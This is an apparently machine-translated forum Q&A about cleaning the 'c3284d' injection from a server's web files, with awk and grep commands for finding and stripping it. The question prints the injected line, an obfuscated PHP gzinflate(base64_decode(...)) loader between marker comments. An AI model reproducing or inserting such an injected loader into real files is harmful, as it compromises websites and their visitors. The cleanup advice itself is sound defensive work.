我遇到了臭名昭着的c3284d病毒的问题。它几乎修改了它可以找到的所有html / php / js文件。
我已经更改了服务器上的所有密码和用户,所以如果它是一个受到破坏的帐户,它应该已经解决了这个问题,但我仍然在努力完全删除它。
我能够使用简单的sudo grep -R "#c3284d#" /home命令找到所有受感染的文件。
但是我需要一种快速搜索方式并替换它。
病毒签名就是这一行:
“#c3284d#” 回波(gzinflate(BASE64_DECODE( “VVHBboMwDL1X6j / kZtA6GKgMdaOVummHnfYB6xQFYkokmqSJS + nfD1hXbb7ZfvZ7fi585ZSlzXzWCcf4ka2ZNNXpgJqiyqEgfGtxzAJQtRMHhHAxn7EhuB6w4JG2RE6VJ0J4ns / 48ZPrrwC8q2DBoCGyT3HcoHBkamtajDRS3B / ayDYWwmki8nQZGtZ4RcpMa0XpTXtbeQWclaRm7CaPtv9LNgkrjZPoBlItOrUXZFx08ui2 + / EUpSX2H3UA8kHkIlmmZZ5lSZ5Kkad1nS9FIqo0S1YrCNkdS / 7parGmkfU + y1b5D / HNorNThAEUUnVMyfUOOJdOyG4HmyIeipvpxBt8j3S18 + XyLoNfNISRsBa1fG1UKwN + HIeK + Pqabw ==”))); “#/ c3284d#”
当回波线可以改变和变化时,它始终以#c32..#开头并以#/c3....#结束。
我只想替换它。
答案 0 :(得分:1)
awk 'BEGIN { clean=1 } /#c3284d#/ { clean=0 } /#\/c3284d#/ { clean=1 } { if (clean==1 && match($0,"#\/c3284d#") == 0) { print $0 } }' dirty-file > clean-file
这是一个满口但是它的诀窍:
$ cat <<'EOF' | awk 'BEGIN { clean=1 } /#c3284d#/ { clean=0 } /#\/c3284d#/ { clean=1 } { if (clean==1 && match($0,"#\/c3284d#") == 0) { print $0 } }'
> foo
> #c3284d#
> bar
> baz
> #/c3284d#
> quux
> EOF
foo
quux
答案 1 :(得分:1)
查找所有受影响文件的简单方法:
grep -H -r "c3284d" /home/user
此恶意软件代码来自受感染的客户端,其FTP密码以纯文本格式存储。恶意软件能够抓取FTP登录,然后自动开始将广告代码注入文件。绝对应该是一个完整的审核 - 但如果你很幸运并及时发现它可能不是来自服务器本身。